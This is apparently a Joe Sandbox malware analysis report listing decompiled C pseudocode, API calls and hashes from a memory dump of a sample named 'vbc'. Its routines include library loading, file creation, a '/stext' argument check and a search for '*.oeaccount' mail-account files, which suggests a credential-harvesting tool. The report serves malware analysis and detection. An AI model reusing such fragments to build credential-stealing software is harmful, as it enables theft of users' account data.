                                                                                                                                                                        • Instruction ID: d787685a6615fa8e7b12f25043f2ee1a52758ce9b2ab1ab1a3353857822e9c29
                                                                                                                                                                        • Opcode Fuzzy Hash: fb7313e2089ba82f806a054faa6efc2dc291e3dbde93792c84ca6474672037a6
                                                                                                                                                                        • Instruction Fuzzy Hash: 8FE012703003206A8E30EB7ABF41AC327CDAA18351394C02EF609D2282DEA8DCE0C42C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004079E7 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                        			E004079E7() {
				void* _t13;
				signed int _t16;
				signed int _t18;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;

				_t33 =  *0x418540;
				if(_t33 == 0) {
					_push(0x8000);
					 *0x418540 = 0x8000;
					 *0x418544 = 0x100;
					 *0x418548 = 0x1000; // executed
					L00412090(); // executed
					 *0x418528 = 0x8000;
					_t27 = 4;
					_t16 =  *0x418544 * _t27;
					_push( ~(0 | _t33 > 0x00000000) | _t16);
					L00412090();
					 *0x418530 = _t16;
					_t29 = 4;
					_t18 =  *0x418544 * _t29;
					_push( ~(0 | _t33 > 0x00000000) | _t18);
					L00412090();
					_push( *0x418548);
					 *0x418534 = _t18; // executed
					L00412090(); // executed
					 *0x41852c = _t18;
					return _t18;
				}
				return _t13;
			}









                                                                                                                                                                        0x004079e7
                                                                                                                                                                        0x004079ee
                                                                                                                                                                        0x004079f5
                                                                                                                                                                        0x004079f6
                                                                                                                                                                        0x004079fb
                                                                                                                                                                        0x00407a05
                                                                                                                                                                        0x00407a0f
                                                                                                                                                                        0x00407a14
                                                                                                                                                                        0x00407a22
                                                                                                                                                                        0x00407a23
                                                                                                                                                                        0x00407a2c
                                                                                                                                                                        0x00407a2d
                                                                                                                                                                        0x00407a32
                                                                                                                                                                        0x00407a40
                                                                                                                                                                        0x00407a41
                                                                                                                                                                        0x00407a4a
                                                                                                                                                                        0x00407a4b
                                                                                                                                                                        0x00407a50
                                                                                                                                                                        0x00407a56
                                                                                                                                                                        0x00407a5b
                                                                                                                                                                        0x00407a63
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407a63
                                                                                                                                                                        0x00407a68

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1033339047-0
                                                                                                                                                                        • Opcode ID: 1f5e21fb5e0b6fdb4249ba77804457959e5d31aa328e92d400b1c26414509871
                                                                                                                                                                        • Instruction ID: c43431202d49818a45d5cc7318ffcbdb911bff3577ce92db202b1535657ef0fb
                                                                                                                                                                        • Opcode Fuzzy Hash: 1f5e21fb5e0b6fdb4249ba77804457959e5d31aa328e92d400b1c26414509871
                                                                                                                                                                        • Instruction Fuzzy Hash: C2F0FFB1542210AEDB94DB34EE467953AE6E708354F10813EE60ACA2B1FFB85440CB0C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00406104 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00406104(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						 *__eax =  *__eax + _a8;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13);
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                                                                        0x00406104
                                                                                                                                                                        0x00406105
                                                                                                                                                                        0x00406109
                                                                                                                                                                        0x00406154
                                                                                                                                                                        0x0040610b
                                                                                                                                                                        0x0040610c
                                                                                                                                                                        0x0040610e
                                                                                                                                                                        0x00406112
                                                                                                                                                                        0x00406114
                                                                                                                                                                        0x00406116
                                                                                                                                                                        0x00406120
                                                                                                                                                                        0x00406128
                                                                                                                                                                        0x0040612a
                                                                                                                                                                        0x0040612e
                                                                                                                                                                        0x00406138
                                                                                                                                                                        0x0040613d
                                                                                                                                                                        0x00406141
                                                                                                                                                                        0x00406146
                                                                                                                                                                        0x00406150
                                                                                                                                                                        0x00406150

                                                                                                                                                                        APIs
                                                                                                                                                                        • malloc.MSVCRT ref: 00406120
                                                                                                                                                                        • memcpy.MSVCRT ref: 00406138
                                                                                                                                                                        • free.MSVCRT(00000000,00000000,73B74DE0,00406B78,00000001,?,00000000,73B74DE0,00406EF2,00000000,?,?), ref: 00406141
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: freemallocmemcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3056473165-0
                                                                                                                                                                        • Opcode ID: 2c99a99ae30e83ce40482d8e5bccf8072ec36ae410a4a270b365b928ce6b5d38
                                                                                                                                                                        • Instruction ID: 359978e28c917f6ac826eaac10a3cae38cc8b637956f46d5a6e637dfc07492fc
                                                                                                                                                                        • Opcode Fuzzy Hash: 2c99a99ae30e83ce40482d8e5bccf8072ec36ae410a4a270b365b928ce6b5d38
                                                                                                                                                                        • Instruction Fuzzy Hash: DFF089726052229FC708AF76A98145BB79DAF48354712487FF505E7282DB38DCA0C7A4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040BAB7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E0040BAB7(void* __edi, void* __eflags) {
				void* __esi;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr _t38;
				void* _t42;
				void* _t45;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t54 = __eflags;
				_t49 = __edi;
				_t38 = 0;
				E00402393( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
				 *((intOrPtr*)(__edi + 0x108)) = 0;
				E00401E4A(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
				_t24 =  *((intOrPtr*)(__edi + 0x37c));
				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
					_t51 = 0x41344f;
				} else {
					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
						_t45 = 0;
						__eflags = 0;
					} else {
						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
					}
					_t51 = _t45;
				}
				_push(_t51);
				_push("/stext");
				L00412072();
				if(_t24 != 0) {
					_t52 = E0040BA21(_t24, _t51);
					__eflags = _t52 - _t38;
					if(_t52 <= _t38) {
						goto L15;
					}
					goto L9;
				} else {
					_t52 = 1;
					L9:
					E0040B031(_t49, _t38); // executed
					E0040A6C6(_t49);
					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
						_t42 = 0x41344f;
					} else {
						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
							_t42 = 0;
						} else {
							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
					E00409C9C( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
					_t38 = 1;
					E0040B1DC(_t49);
					L15:
					return _t38;
				}
			}












                                                                                                                                                                        0x0040bab7
                                                                                                                                                                        0x0040bab7
                                                                                                                                                                        0x0040bac0
                                                                                                                                                                        0x0040bac4
                                                                                                                                                                        0x0040bad5
                                                                                                                                                                        0x0040badb
                                                                                                                                                                        0x0040bae0
                                                                                                                                                                        0x0040bae9
                                                                                                                                                                        0x0040bb00
                                                                                                                                                                        0x0040baeb
                                                                                                                                                                        0x0040baee
                                                                                                                                                                        0x0040bafa
                                                                                                                                                                        0x0040bafa
                                                                                                                                                                        0x0040baf0
                                                                                                                                                                        0x0040baf5
                                                                                                                                                                        0x0040baf5
                                                                                                                                                                        0x0040bafc
                                                                                                                                                                        0x0040bafc
                                                                                                                                                                        0x0040bb05
                                                                                                                                                                        0x0040bb06
                                                                                                                                                                        0x0040bb0b
                                                                                                                                                                        0x0040bb14
                                                                                                                                                                        0x0040bb20
                                                                                                                                                                        0x0040bb22
                                                                                                                                                                        0x0040bb24
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bb16
                                                                                                                                                                        0x0040bb18
                                                                                                                                                                        0x0040bb26
                                                                                                                                                                        0x0040bb29
                                                                                                                                                                        0x0040bb30
                                                                                                                                                                        0x0040bb35
                                                                                                                                                                        0x0040bb3f
                                                                                                                                                                        0x0040bb56
                                                                                                                                                                        0x0040bb41
                                                                                                                                                                        0x0040bb41
                                                                                                                                                                        0x0040bb45
                                                                                                                                                                        0x0040bb52
                                                                                                                                                                        0x0040bb47
                                                                                                                                                                        0x0040bb4d
                                                                                                                                                                        0x0040bb4d
                                                                                                                                                                        0x0040bb45
                                                                                                                                                                        0x0040bb6b
                                                                                                                                                                        0x0040bb78
                                                                                                                                                                        0x0040bb81
                                                                                                                                                                        0x0040bb82
                                                                                                                                                                        0x0040bb88
                                                                                                                                                                        0x0040bb8c
                                                                                                                                                                        0x0040bb8c

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00401E4A: memset.MSVCRT ref: 00401E6C
                                                                                                                                                                          • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401E85
                                                                                                                                                                          • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401E93
                                                                                                                                                                          • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401ED9
                                                                                                                                                                          • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401EE7
                                                                                                                                                                        • _stricmp.MSVCRT(/stext,0041344F,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BB0B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strlen$_stricmpmemset
                                                                                                                                                                        • String ID: /stext
                                                                                                                                                                        • API String ID: 3575250601-3817206916
                                                                                                                                                                        • Opcode ID: ef7f166fbeea55439cfe23be9aafe6a7a28943b2fccc9fc2cab937996929cfca
                                                                                                                                                                        • Instruction ID: f8692cde8425b7317fc14f1eb66aa5838d4e8645dd66f9f31b24f8adae3a6e9d
                                                                                                                                                                        • Opcode Fuzzy Hash: ef7f166fbeea55439cfe23be9aafe6a7a28943b2fccc9fc2cab937996929cfca
                                                                                                                                                                        • Instruction Fuzzy Hash: 20213E707141119FC368AF29C8D1A66B3A8FB04318B15827FE41AA7692C779EC518BCD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040625C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040625C() {
				struct tagLOGFONTA _v64;
				struct HFONT__* _t6;

				E0040619B( &_v64, "Arial", 0xe, 0);
				_t6 = CreateFontIndirectA( &_v64); // executed
				return _t6;
			}





                                                                                                                                                                        0x0040626e
                                                                                                                                                                        0x0040627a
                                                                                                                                                                        0x00406281

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040619B: memset.MSVCRT ref: 004061A5
                                                                                                                                                                          • Part of subcall function 0040619B: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406273,Arial,0000000E,00000000), ref: 004061E5
                                                                                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 0040627A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFontIndirectmemsetstrcpy
                                                                                                                                                                        • String ID: Arial
                                                                                                                                                                        • API String ID: 3275230829-493054409
                                                                                                                                                                        • Opcode ID: 4817efd26ad33d4b637fc7e29178505d6c073bef41158034ee275bb9fa043b80
                                                                                                                                                                        • Instruction ID: 6f23277ce9f10cc220d5cb12b38cfb89722835dabc034d80cc056b5664af2580
                                                                                                                                                                        • Opcode Fuzzy Hash: 4817efd26ad33d4b637fc7e29178505d6c073bef41158034ee275bb9fa043b80
                                                                                                                                                                        • Instruction Fuzzy Hash: 8FD01270D4020D77E610FBA0FC07FC97BAC5B00B05F504431B901F50E6FAE8E2598699
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004047AA Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004047AA(CHAR* __esi, void* __eflags) {
				struct HINSTANCE__* _t8;
				char _t12;
				char* _t15;
				CHAR* _t17;

				_t17 = __esi;
				E004047FB(__esi);
				_t8 = LoadLibraryA(__esi); // executed
				__esi[0x200] = _t8;
				if(_t8 != 0) {
					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
					__esi[0x208] = _t12;
					if(_t12 != 0) {
						__esi[0x204] = 1;
					}
				}
				_t15 =  &(_t17[0x204]);
				if( *_t15 == 0) {
					E004047FB(_t17);
				}
				return  *_t15;
			}







                                                                                                                                                                        0x004047aa
                                                                                                                                                                        0x004047ac
                                                                                                                                                                        0x004047b2
                                                                                                                                                                        0x004047ba
                                                                                                                                                                        0x004047c0
                                                                                                                                                                        0x004047ca
                                                                                                                                                                        0x004047d2
                                                                                                                                                                        0x004047d8
                                                                                                                                                                        0x004047da
                                                                                                                                                                        0x004047da
                                                                                                                                                                        0x004047d8
                                                                                                                                                                        0x004047e5
                                                                                                                                                                        0x004047ee
                                                                                                                                                                        0x004047f2
                                                                                                                                                                        0x004047f2
                                                                                                                                                                        0x004047fa

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004047FB: FreeLibrary.KERNELBASE(?,?), ref: 00404810
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,73AFF420), ref: 004047B2
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 145871493-0
                                                                                                                                                                        • Opcode ID: 79a2d912799eded2ecd004947e833272afd2c53e23871a46eb3e118a9608fd27
                                                                                                                                                                        • Instruction ID: a05247dfa83e1e5897bdf1ebfda0bf15c3173a66790072ff667e3a7d903ceddc
                                                                                                                                                                        • Opcode Fuzzy Hash: 79a2d912799eded2ecd004947e833272afd2c53e23871a46eb3e118a9608fd27
                                                                                                                                                                        • Instruction Fuzzy Hash: C6F0E5B46007038BD720DF39D849797B7E8AF45701F00853EF166E3185E778A641C758
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F17F Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 0040F1A6
                                                                                                                                                                          • Part of subcall function 0040F097: memset.MSVCRT ref: 0040F0B5
                                                                                                                                                                          • Part of subcall function 0040F097: _itoa.MSVCRT ref: 0040F0CC
                                                                                                                                                                          • Part of subcall function 0040F097: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040F0DB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4165544737-0
                                                                                                                                                                        • Opcode ID: 60443182dfafd2705f0bd8163bf991a75ed65358abc62ac36d7f3c586c4344a1
                                                                                                                                                                        • Instruction ID: ef80bc42b69c7626de0f5e8b39bb4bd6d74a87ec05759e80c101291bc1ad5009
                                                                                                                                                                        • Opcode Fuzzy Hash: 60443182dfafd2705f0bd8163bf991a75ed65358abc62ac36d7f3c586c4344a1
                                                                                                                                                                        • Instruction Fuzzy Hash: 22E0B632004209FBCF125F90EC01AA93FA6FF04315F148479F95C14961E33295B4AB84
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004047FB Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004047FB(void* __eax) {
				struct HINSTANCE__* _t5;
				signed int* _t7;

				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
				_t7 = __eax + 0x200;
				_t5 =  *_t7;
				if(_t5 != 0) {
					_t5 = FreeLibrary(_t5); // executed
					 *_t7 =  *_t7 & 0x00000000;
				}
				return _t5;
			}





                                                                                                                                                                        0x004047fb
                                                                                                                                                                        0x00404803
                                                                                                                                                                        0x00404809
                                                                                                                                                                        0x0040480d
                                                                                                                                                                        0x00404810
                                                                                                                                                                        0x00404816
                                                                                                                                                                        0x00404816
                                                                                                                                                                        0x0040481a

                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNELBASE(?,?), ref: 00404810
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                        • Opcode ID: 9daaca44af3c137c04138a24eb8ff8cf64b72ee1785e34895ec44d417b16343b
                                                                                                                                                                        • Instruction ID: a9857fde68bfdf8991c7705c8330266d98638ef7b5ff2aef664b3e01c595234a
                                                                                                                                                                        • Opcode Fuzzy Hash: 9daaca44af3c137c04138a24eb8ff8cf64b72ee1785e34895ec44d417b16343b
                                                                                                                                                                        • Instruction Fuzzy Hash: 54D012B61003118FDB209F14EC0CBE133ECAF40312F15C4B9E951A7156C3349540CA58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00405EEE Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00405EEE(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}




                                                                                                                                                                        0x00405f00
                                                                                                                                                                        0x00405f06

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409CBE,00000000,00000000,00000000,0041344F,0041344F,?,0040BB7D,0041344F), ref: 00405F00
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 9dd7920263122c6c5394d1aa857aadcc673b4f54c51fbdd86ca26a9f0088c7b1
                                                                                                                                                                        • Instruction ID: bc29cfa666e89d0cfbdb77cae37961506820f0e8ddae25b665a114bfacacae09
                                                                                                                                                                        • Opcode Fuzzy Hash: 9dd7920263122c6c5394d1aa857aadcc673b4f54c51fbdd86ca26a9f0088c7b1
                                                                                                                                                                        • Instruction Fuzzy Hash: 1BC092B0660200BEFE208A20AC0AF77299DD780705F1084207A04E40E0C2A18C008624
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F402 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040F402(struct HINSTANCE__* _a4, CHAR* _a8) {

				EnumResourceNamesA(_a4, _a8, E0040F37C, 0); // executed
				return 1;
			}



                                                                                                                                                                        0x0040f411
                                                                                                                                                                        0x0040f41a

                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumResourceNamesA.KERNEL32(?,?,0040F37C,00000000), ref: 0040F411
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumNamesResource
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3334572018-0
                                                                                                                                                                        • Opcode ID: 37d1da76d95b5e126e15f716cf118d031e4b8f34fe6c8a3d6132a8d2fb8fd21e
                                                                                                                                                                        • Instruction ID: fad5876d7f8aa1560905c766ba53a11d3010bfcf0403834e812c2ac38a9eeaed
                                                                                                                                                                        • Opcode Fuzzy Hash: 37d1da76d95b5e126e15f716cf118d031e4b8f34fe6c8a3d6132a8d2fb8fd21e
                                                                                                                                                                        • Instruction Fuzzy Hash: 88C09B31594341D7C711DF208C05F1BFEE5BB5C702F108C3D7151D40E4C77180189615
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004070C5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004070C5(signed int* __esi) {
				int _t2;
				void* _t3;

				_t3 =  *__esi;
				if(_t3 != 0xffffffff) {
					_t2 = FindClose(_t3); // executed
					 *__esi =  *__esi | 0xffffffff;
					return _t2;
				}
				return 0;
			}





                                                                                                                                                                        0x004070c5
                                                                                                                                                                        0x004070cc
                                                                                                                                                                        0x004070cf
                                                                                                                                                                        0x004070d5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004070d5
                                                                                                                                                                        0x004070d8

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindClose.KERNELBASE(?,00406FDF,?,?,00000000,?,00411327,*.oeaccount,0041141B,?,00000104), ref: 004070CF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFind
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                                                        • Opcode ID: 1626034a8a252c87a5f1d6eb16cf0afdbdd25481107d0dfa13c5d9d9acae7190
                                                                                                                                                                        • Instruction ID: fb6f9d5761a39194e530e87d941626cbb459cc8d01e30c2ad93bf7984ca40ca8
                                                                                                                                                                        • Opcode Fuzzy Hash: 1626034a8a252c87a5f1d6eb16cf0afdbdd25481107d0dfa13c5d9d9acae7190
                                                                                                                                                                        • Instruction Fuzzy Hash: 77C09230510A01ABD23C5F389C5A46A7BA0AF593323B48F6CE0F3D24F0E73899868A04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040EF05 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040EF05(void* __esi) {
				struct HINSTANCE__* _t6;
				int _t7;

				_t6 =  *(__esi + 8);
				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
				if(_t6 != 0) {
					_t7 = FreeLibrary(_t6); // executed
					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
					return _t7;
				}
				return _t6;
			}





                                                                                                                                                                        0x0040ef05
                                                                                                                                                                        0x0040ef08
                                                                                                                                                                        0x0040ef0e
                                                                                                                                                                        0x0040ef11
                                                                                                                                                                        0x0040ef17
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ef17
                                                                                                                                                                        0x0040ef1b

                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNELBASE(?,0040EF39,?,?,?,?,?,?,00404221), ref: 0040EF11
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                        • Opcode ID: 2e074f5d4832a7d58a2bd7b26742b92faf01e6cbf369b165caea939fd76fa933
                                                                                                                                                                        • Instruction ID: 3414d520a0ca87f174e03c7aae78275fe345844bef97b548c291c08909f1245b
                                                                                                                                                                        • Opcode Fuzzy Hash: 2e074f5d4832a7d58a2bd7b26742b92faf01e6cbf369b165caea939fd76fa933
